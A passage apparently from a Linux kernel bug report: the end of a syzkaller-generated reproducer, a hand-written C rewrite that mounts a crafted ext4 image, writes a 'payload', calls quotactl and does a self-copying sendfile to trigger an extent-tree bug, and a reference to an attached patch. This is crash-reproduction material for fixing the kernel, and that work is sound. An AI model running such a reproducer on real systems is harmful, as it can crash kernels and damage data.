"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x38\xb9\xfe\x0e\x00\x00\xff\xff\x97\x1b\xfb"
"\xf2",
1135);
syz_mount_image(/*fs=*/0x200000000b80, /*dir=*/0x200000000000, /*flags=*/0,
/*opts=*/0x200000000ac0, /*chdir=*/1, /*size=*/0x46f,
/*img=*/0x200000000540);
// syz_create_resource$binfmt arguments: [
// file: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// ]
// returns ptr_binfmt_file
memcpy((void*)0x200000000040, "./file1\000", 8);
res = -1;
res = syz_create_resource(/*file=*/0x200000000040);
if (res != -1)
r[0] = res;
// openat$binfmt arguments: [
// fd: const = 0xffffffffffffff9c (8 bytes)
// file: ptr_binfmt_file (resource)
// flags: const = 0x2 (4 bytes)
// mode: const = 0x0 (2 bytes)
// ]
// returns fd_binfmt
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/r[0],
/*flags=*/2, /*mode=*/0);
if (res != -1)
r[1] = res;
// write arguments: [
// fd: fd (resource)
// buf: ptr[in, buffer] {
// buffer: {0a 38 16 46 c3 bd e5 04 cc 45 43 f0 1c eb ae 2e b4 38 4d 6a
// 23 36 4e 46 c3 0a bf 1b 5f 16 ea e0 e4 05 ab 25 6d 31 7c f8 30 ce a9
// fc 38 36 38 e6 81 f3 a4 56 47 64 6d fd 88 25 02 1a ce 67 93 02 ff 6f
// 54 40 a8 14 b6 c9 08 93 b1 5d 2b 84 27 8f de 8f 97 57 20 c3 d4 6c 32
// c3 2d 89 fe d8 f2 f2 79 50 8a 3e 90 c3 a7 16 53 b1 a0 38 4b 6a f5 4f
// aa 0d 42 bc 4d e0 cf ad 85 73 01 81 26 b6 9b 06 fc 05 dd 18 54 dc ba
// 70 d3 52 de b9 20 3f 25 19 18 f2 47 51 47 fe 52 56 fe f7 72 ee 5a 1d
// 96 2c 36 6a bf 0a b4 a9 c4 1b 8c 12 14 00 00 00 00 00 00} (length
// 0xb1)
// }
// count: len = 0xffffff22 (8 bytes)
// ]
memcpy(
(void*)0x200000000300,
"\x0a\x38\x16\x46\xc3\xbd\xe5\x04\xcc\x45\x43\xf0\x1c\xeb\xae\x2e\xb4\x38"
"\x4d\x6a\x23\x36\x4e\x46\xc3\x0a\xbf\x1b\x5f\x16\xea\xe0\xe4\x05\xab\x25"
"\x6d\x31\x7c\xf8\x30\xce\xa9\xfc\x38\x36\x38\xe6\x81\xf3\xa4\x56\x47\x64"
"\x6d\xfd\x88\x25\x02\x1a\xce\x67\x93\x02\xff\x6f\x54\x40\xa8\x14\xb6\xc9"
"\x08\x93\xb1\x5d\x2b\x84\x27\x8f\xde\x8f\x97\x57\x20\xc3\xd4\x6c\x32\xc3"
"\x2d\x89\xfe\xd8\xf2\xf2\x79\x50\x8a\x3e\x90\xc3\xa7\x16\x53\xb1\xa0\x38"
"\x4b\x6a\xf5\x4f\xaa\x0d\x42\xbc\x4d\xe0\xcf\xad\x85\x73\x01\x81\x26\xb6"
"\x9b\x06\xfc\x05\xdd\x18\x54\xdc\xba\x70\xd3\x52\xde\xb9\x20\x3f\x25\x19"
"\x18\xf2\x47\x51\x47\xfe\x52\x56\xfe\xf7\x72\xee\x5a\x1d\x96\x2c\x36\x6a"
"\xbf\x0a\xb4\xa9\xc4\x1b\x8c\x12\x14\x00\x00\x00\x00\x00\x00",
177);
syscall(__NR_write, /*fd=*/r[1], /*buf=*/0x200000000300ul,
/*count=*/0xffffff22ul);
// syz_create_resource$binfmt arguments: [
// file: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// ]
// returns ptr_binfmt_file
memcpy((void*)0x200000000040, "./file1\000", 8);
res = -1;
res = syz_create_resource(/*file=*/0x200000000040);
if (res != -1)
r[2] = res;
// quotactl$Q_SETQUOTA arguments: [
// cmd: quota_cmd_setquota = 0xffffffff80000801 (8 bytes)
// special: ptr[in, blockdev_filename] {
// union blockdev_filename {
// loop: loop_filename {
// prefix: buffer: {2f 64 65 76 2f 6c 6f 6f 70} (length 0x9)
// id: proc = 0x0 (1 bytes)
// z: const = 0x0 (1 bytes)
// }
// }
// }
// id: uid (resource)
// addr: nil
// ]
memcpy((void*)0x200000000040, "/dev/loop", 9);
*(uint8_t*)0x200000000049 = 0x30;
*(uint8_t*)0x20000000004a = 0;
syscall(__NR_quotactl, /*cmd=Q_SETQUOTA_GRP*/ 0xffffffff80000801ul,
/*special=*/0x200000000040ul, /*id=*/0, /*addr=*/0ul);
// openat$binfmt arguments: [
// fd: const = 0xffffffffffffff9c (8 bytes)
// file: ptr_binfmt_file (resource)
// flags: const = 0x42 (4 bytes)
// mode: const = 0x1ff (2 bytes)
// ]
// returns fd_binfmt
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/r[2],
/*flags=*/0x42, /*mode=*/0x1ff);
if (res != -1)
r[3] = res;
// sendfile arguments: [
// fdout: fd (resource)
// fdin: fd (resource)
// off: ptr[inout, intptr] {
// intptr = 0x1 (8 bytes)
// }
// count: intptr = 0x80800 (8 bytes)
// ]
*(uint64_t*)0x2000000000c0 = 1;
syscall(__NR_sendfile, /*fdout=*/r[3], /*fdin=*/r[3],
/*off=*/0x2000000000c0ul, /*count=*/0x80800ul);
return 0;
}#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sendfile.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/loop.h>
#include <errno.h>

// Helper to handle errors
void die(const char *msg) {
perror(msg);
exit(1);
}

// Global to store loop device name
char loop_device_path[64];

void setup_loop_and_mount(const char *img_path, const char *mount_point) {
// 1. Get a free loop device
int loop_ctl_fd = open("/dev/loop-control", O_RDWR);
if (loop_ctl_fd == -1) die("open /dev/loop-control");

long devnr = ioctl(loop_ctl_fd, LOOP_CTL_GET_FREE);
if (devnr == -1) die("LOOP_CTL_GET_FREE");
close(loop_ctl_fd);

snprintf(loop_device_path, sizeof(loop_device_path), "/dev/loop%ld", devnr);
printf("[*] Using loop device: %s\n", loop_device_path);

// 2. Attach image to loop device
int loop_fd = open(loop_device_path, O_RDWR);
if (loop_fd == -1) die("open loop device");

int img_fd = open(img_path, O_RDWR);
if (img_fd == -1) die("open image file");

if (ioctl(loop_fd, LOOP_SET_FD, img_fd) == -1) die("LOOP_SET_FD");
close(img_fd);
close(loop_fd);

// 3. Mount the filesystem
// Options derived from original repro:
// inode_readahead_blks=0x200000, usrjquota=, nojournal_checksum, stripe=0x24, usrquota, mb_optimize_scan=0x1
const char *opts = "inode_readahead_blks=2097152,usrjquota=,nojournal_checksum,stripe=36,usrquota,mb_optimize_scan=1,errors=continue";

mkdir(mount_point, 0777);
if (mount(loop_device_path, mount_point, "ext4", 0, opts) == -1) {
die("mount");
}
printf("[*] Mounted %s to %s\n", img_path, mount_point);
}

int main(int argc, char *argv[]) {
const char *img_file = "image.img";
const char *mount_dir = "./mnt";

if (argc > 1) img_file = argv[1];

if (access(img_file, F_OK) == -1) {
fprintf(stderr, "Error: %s not found. Please extract it first using extract_image.py\n", img_file);
return 1;
}

// Setup environment
system("mkdir -p ./mnt");
setup_loop_and_mount(img_file, mount_dir);

char file_path[256];
snprintf(file_path, sizeof(file_path), "%s/file1", mount_dir);

printf("[*] Triggering bug...\n");

// 1. Open file (First time)
int fd1 = open(file_path, O_RDWR | O_CREAT, 0666);
if (fd1 == -1) perror("open file1 (1)");

// 2. Write payload
// This specific data pattern might be relevant for the extent tree structure
char payload[] =
"\x0a\x38\x16\x46\xc3\xbd\xe5\x04\xcc\x45\x43\xf0\x1c\xeb\xae\x2e\xb4\x38"
"\x4d\x6a\x23\x36\x4e\x46\xc3\x0a\xbf\x1b\x5f\x16\xea\xe0\xe4\x05\xab\x25"
"\x6d\x31\x7c\xf8\x30\xce\xa9\xfc\x38\x36\x38\xe6\x81\xf3\xa4\x56\x47\x64"
"\x6d\xfd\x88\x25\x02\x1a\xce\x67\x93\x02\xff\x6f\x54\x40\xa8\x14\xb6\xc9"
"\x08\x93\xb1\x5d\x2b\x84\x27\x8f\xde\x8f\x97\x57\x20\xc3\xd4\x6c\x32\xc3"
"\x2d\x89\xfe\xd8\xf2\xf2\x79\x50\x8a\x3e\x90\xc3\xa7\x16\x53\xb1\xa0\x38"
"\x4b\x6a\xf5\x4f\xaa\x0d\x42\xbc\x4d\xe0\xcf\xad\x85\x73\x01\x81\x26\xb6"
"\x9b\x06\xfc\x05\xdd\x18\x54\xdc\xba\x70\xd3\x52\xde\xb9\x20\x3f\x25\x19"
"\x18\xf2\x47\x51\x47\xfe\x52\x56\xfe\xf7\x72\xee\x5a\x1d\x96\x2c\x36\x6a"
"\xbf\x0a\xb4\xa9\xc4\x1b\x8c\x12\x14";

if (write(fd1, payload, sizeof(payload)-1) < 0) perror("write");

// 3. Quotactl (Q_SETQUOTA)
// cmd=0xffffffff80000801 -> Q_SETQUOTA | GRPQUOTA (0x1)
// This might be setting up quota structures that interact with extents
if (syscall(__NR_quotactl, 0x80000801, loop_device_path, 0, 0) < 0) {
// Don't die here, it might fail if quota not enabled but we proceed
// perror("quotactl");
}

// 4. Open file (Second time)
int fd2 = open(file_path, O_RDWR | O_CREAT, 0666);
if (fd2 == -1) perror("open file1 (2)");

// 5. Sendfile (Self-copy)
// This is the critical step that likely triggers the extent tree traversal
// offset = 1, count = 0x80800
off_t offset = 1;
ssize_t s = sendfile(fd2, fd2, &offset, 0x80800);

printf("[*] sendfile returned: %ld\n", s);
printf("[*] Done. If kernel didn't crash, the repro finished.\n");

return 0;
}

Attachment: ext4_find_extent.patch
Description: Binary data